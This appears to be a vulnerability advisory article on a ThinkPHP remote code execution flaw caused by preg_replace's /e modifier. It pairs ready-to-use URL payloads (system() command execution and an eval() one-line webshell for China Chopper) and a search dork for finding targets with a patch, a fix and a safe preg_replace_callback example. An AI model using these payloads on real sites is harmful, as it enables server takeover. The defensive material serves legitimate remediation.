Exploitation and Repair of Arbitrary Code Execution Vulnerability in ThinkPHP Framework

  • 2021-07-06 10:40:14
  • OfStack

ThinkPHP is a well-known open source PHP framework in China, created to simplify enterprise application development and agile web application development. It was first born in early 2006 under the name FCS, was officially renamed ThinkPHP on New Year's Day 2007, and is released under the Apache 2 open source license. Its early design originated from Struts; after continuous improvement it also drew on many excellent foreign frameworks and patterns. It uses an object-oriented development structure and the MVC pattern, integrates the Action and Dao ideas of Struts, the TagLib (tag library) of JSP and the ORM mapping and ActiveRecord pattern of RoR, encapsulates CURD and other common operations, uses a single-entry mode, and has distinctive features in its template engine, caching mechanism, authentication mechanism and extensibility.

Recently, however, an arbitrary code execution vulnerability was disclosed in the ThinkPHP framework, and its impact is considerable. The vulnerability is exploited as follows:


index.php/module/action/param1/${@print(THINK_VERSION)}

index.php/module/action/param1/${@function_all()}

Here function_all stands for any PHP function, for example:


index.php/module/action/param1/${@phpinfo()}

This returns the server's PHP configuration information.


index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

This lists the files of the website.


index.php/module/action/param1/{${eval($_POST[s])}}

This executes a one-line webshell (一句话木马), which a client such as China Chopper (菜刀) can then connect to directly.

Attackers can also obtain lists of websites built on the ThinkPHP framework in bulk through the Google search keyword "thinkphp intitle:System error", so the impact of the vulnerability is considerable.

Fix for the ThinkPHP framework arbitrary code execution vulnerability:

Users can download the officially released patch:

http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838

Or modify the source code directly:

In /ThinkPHP/Lib/Core/Dispatcher.class.php, find the line:


$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

and change it to:


$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']=\'\\2\';', implode($depr,$paths));

That is, change the double quotation marks around the value "\\2" in the second parameter of preg_replace to single quotation marks, so that PHP's variable syntax is not parsed and executed. The e modifier on the pattern makes preg_replace evaluate the replacement string as PHP code after the captured groups have been substituted; inside a double-quoted string PHP interpolates ${...} expressions, so a crafted path segment such as ${@phpinfo()} is executed, whereas a single-quoted string is stored literally. Note that the e modifier itself was deprecated in PHP 5.5 and removed in PHP 7.0; preg_replace_callback is the replacement that avoids evaluating a string as code at all.
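The following is an added example, not ThinkPHP's own code, showing how the same name/value path parsing can be done with preg_replace_callback so that no string is ever evaluated as PHP. The function name parsePathParams and the sample inputs are constructed for illustration; the separator $depr is assumed to be '/' as in the original dispatcher.

```php
<?php
// Added example, not ThinkPHP's own code. Parses "name/value/name/value"
// path segments as Dispatcher.class.php did, but with preg_replace_callback
// instead of the /e modifier, so no replacement string is evaluated as PHP.
// Assumption: $depr is the URL path separator ('/'), as in the original dispatcher.

function parsePathParams(string $path, string $depr = '/'): array
{
    $var = [];
    $sep = preg_quote($depr, '@');
    // Same shape as the original pattern: a word (the parameter name), the
    // separator, then a value containing neither the separator nor a slash.
    $pattern = '@(\w+)' . $sep . '([^' . $sep . '\/]+)@';

    preg_replace_callback(
        $pattern,
        function (array $m) use (&$var): string {
            // The captured value is assigned as plain data; it is never
            // interpolated into a string that PHP evaluates.
            $var[$m[1]] = $m[2];
            return '';
        },
        $path
    );

    return $var;
}

// Constructed inputs. The second one has the ${...} shape from the advisory:
// under the /e-based code it would have been evaluated, here it is simply
// stored as the literal value of param1.
var_dump(parsePathParams('param1/value1/param2/value2'));
var_dump(parsePathParams('param1/${@print(THINK_VERSION)}'));
```

With a normal path the function returns the name/value pairs; with the ${...} payload it returns that text as the literal value of param1 and nothing is executed, because the callback assigns the captured value as data instead of building PHP source from it.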

Note: This article is for reference only, please do not use it for illegal purposes.

Readers interested in more ThinkPHP content can consult the following topics on this site: "ThinkPHP Introduction Tutorial", "thinkPHP Template Operation Skills Summary", "ThinkPHP Common Methods Summary", "smarty Template Introduction Basic Tutorial" and "PHP Template Technology Summary".

We hope this article helps with PHP development on the ThinkPHP framework.

